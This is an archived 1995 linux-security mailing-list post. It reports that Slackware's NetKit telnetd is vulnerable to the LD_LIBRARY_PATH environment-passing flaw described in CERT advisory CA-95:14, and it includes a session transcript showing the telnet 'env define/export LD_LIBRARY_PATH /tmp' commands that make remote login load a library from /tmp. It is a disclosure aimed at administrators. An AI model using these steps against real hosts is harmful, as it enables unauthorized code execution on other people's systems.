[437] in linux-security and linux-alert archive
Telnet vulnerability: shared libraries (fwd)
daemon@ATHENA.MIT.EDU (matt sommer)
Sun Nov 5 16:21:32 1995
Date: Fri, 3 Nov 1995 12:37:43 -0800 (PST)
From: matt sommer <mms@elwha.evergreen.edu>
To: linux-security@tarsier.cv.nrao.edu
hey folks,
i am surprised that no one has cross posted this yet, so here it is...
in both the included posting from BUGTRAQ and the corresponding CERT
advisory (CA-95:14) they do not state explicitly that Slackware based
Linux is vulnerable but as you can see those of us using telnetd from
NetKit-B-0.05 definately are...
--------
Script started on Wed Nov 1 23:13:13 1995
[23:13:13]:~$ telnet
telnet> env define LD_LIBRARY_PATH /tmp
telnet> env export LD_LIBRARY_PATH
telnet> set options
Will show option processing.
telnet> o xxx.xxx.xxx
Trying xxx.xxx.xxx...
Connected to xxx.xxx.xxx
Escape character is '^]'.
SENT DO SUPPRESS GO AHEAD
SENT WILL TERMINAL TYPE
SENT WILL NAWS
SENT WILL TSPEED
SENT WILL LFLOW
SENT WILL LINEMODE
SENT WILL ENVIRON <<<<<<<<<<<<<
SENT DO STATUS
SENT WILL XDISPLOC
RCVD DO AUTHENTICATION
SENT WONT AUTHENTICATION
RCVD WILL SUPPRESS GO AHEAD
RCVD DO TERMINAL TYPE
RCVD DO NAWS
SENT IAC SB NAWS 0 80 (80) 0 25 (25)
RCVD DO TSPEED
RCVD DO LFLOW
RCVD DONT LINEMODE
RCVD DO ENVIRON <<<<<<<<<<<<<
RCVD WILL STATUS
RCVD DO XDISPLOC
RCVD IAC SB TERMINAL-SPEED SEND
SENT IAC SB TERMINAL-SPEED IS 38400,38400
RCVD IAC SB X-DISPLAY-LOCATION SEND
SENT IAC SB X-DISPLAY-LOCATION IS "xxx:0.0"
RCVD IAC SB ENVIRON SEND
SENT IAC SB ENVIRON IS VAR "LD_LIBRARY_PATH" VALUE "/tmp" VAR "DISPLAY" VALUE "xxx:0.0" RCVD IAC SB TERMINAL-TYPE SEND
SENT IAC SB TERMINAL-TYPE IS "XTERM"
RCVD DO ECHO
SENT WONT ECHO
RCVD WILL ECHO
SENT DO ECHO
Linux 1.2.8 (xxx.xxx.xxx)
Unauthorized access is a criminal offense.
If you are not an authorized user, disconnect NOW.
login: can't load library '/tmp/libc.so.4'
Permission denied
login: Connection closed by foreign host.
[23:14:34]:~$ exit
Script done on Wed Nov 1 23:14:40 1995
-------------
i believe that it might be possible to use the CERT wrapper ( see
CA-95:14 ) in login.c from the new shadow suite ( shadow-3.3.2 ) to
get login to "ignore" certain environment strings passed to it but
i havent had much time to play with it...
cu,
m.
-----
just keeping the trains running...
[Mod: Repeat posting of Sam Hartman's <hartmans@MIT.EDU> bugtraq posting
deleted. --Jeff]
